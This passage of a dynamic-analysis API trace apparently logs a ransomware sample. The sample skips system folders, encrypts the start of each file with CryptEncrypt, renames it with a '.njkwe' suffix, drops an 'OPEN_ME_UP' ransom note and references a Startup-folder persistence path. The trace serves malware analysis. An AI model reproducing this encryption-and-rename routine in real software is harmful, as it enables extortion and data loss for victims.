hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.919] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.919] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.919] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.919] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.919] CloseHandle (hObject=0x42c) returned 1 [0060.921] GetProcessHeap () returned 0xbe0000 [0060.921] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.921] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.922] GetProcessHeap () returned 0xbe0000 [0060.922] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.922] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.922] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 49 [0060.922] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.922] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.922] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.922] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.922] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.922] GetTickCount () returned 0x114fa8e [0060.922] GetTickCount () returned 0x114fa8e [0060.922] GetTickCount () returned 0x114fa8e [0060.922] GetTickCount () returned 0x114fa8e [0060.923] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.923] GetProcessHeap () returned 0xbe0000 [0060.923] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.923] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.931] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.931] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.931] GetProcessHeap () returned 0xbe0000 [0060.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.932] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.932] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.932] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.932] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.932] CloseHandle (hObject=0x42c) returned 1 [0060.933] GetProcessHeap () returned 0xbe0000 [0060.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.933] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.933] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.933] GetProcessHeap () returned 0xbe0000 [0060.934] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.934] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.934] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0060.934] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.934] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1032\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.934] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.935] CloseHandle (hObject=0x428) returned 1 [0060.935] GetProcessHeap () returned 0xbe0000 [0060.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.935] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1033", cAlternateFileName="")) returned 1 [0060.935] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0060.935] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0060.935] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0060.935] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0060.935] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0060.935] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033") returned 30 [0060.935] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0060.935] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0060.935] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.935] GetProcessHeap () returned 0xbe0000 [0060.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.935] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\*") returned 32 [0060.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0060.936] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.936] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.936] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.936] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.936] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.936] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\.") returned 32 [0060.936] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.936] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.936] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.936] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.936] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.936] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.936] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.936] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\..") returned 33 [0060.936] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.936] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.936] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.937] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.937] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.937] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.937] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.937] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.937] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 39 [0060.937] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.937] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.937] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.937] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.937] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.937] GetTickCount () returned 0x114fa9d [0060.937] GetTickCount () returned 0x114fa9d [0060.937] GetTickCount () returned 0x114fa9d [0060.937] GetTickCount () returned 0x114fa9d [0060.937] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.937] GetProcessHeap () returned 0xbe0000 [0060.937] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.937] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xc74, lpOverlapped=0x0) returned 1 [0060.974] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff38c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.974] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xc74, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xc74, lpOverlapped=0x0) returned 1 [0060.974] GetProcessHeap () returned 0xbe0000 [0060.974] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.974] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.974] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.974] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.974] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.974] CloseHandle (hObject=0x42c) returned 1 [0060.975] GetProcessHeap () returned 0xbe0000 [0060.975] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.975] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.977] GetProcessHeap () returned 0xbe0000 [0060.977] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.977] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.977] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 48 [0060.978] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.978] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.978] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.978] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.978] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.978] GetTickCount () returned 0x114facc [0060.978] GetTickCount () returned 0x114facc [0060.978] GetTickCount () returned 0x114facc [0060.978] GetTickCount () returned 0x114facc [0060.978] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.978] GetProcessHeap () returned 0xbe0000 [0060.979] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.979] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.980] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.980] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.981] GetProcessHeap () returned 0xbe0000 [0060.981] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.981] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.981] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.981] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.981] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.981] CloseHandle (hObject=0x42c) returned 1 [0060.983] GetProcessHeap () returned 0xbe0000 [0060.983] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.983] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.984] GetProcessHeap () returned 0xbe0000 [0060.984] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.984] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.984] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.984] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.984] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.984] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.984] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.984] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 49 [0060.984] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.984] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.984] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.984] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.984] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.984] GetTickCount () returned 0x114facc [0060.984] GetTickCount () returned 0x114facc [0060.984] GetTickCount () returned 0x114facc [0060.984] GetTickCount () returned 0x114facc [0060.984] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.985] GetProcessHeap () returned 0xbe0000 [0060.985] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.985] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.987] 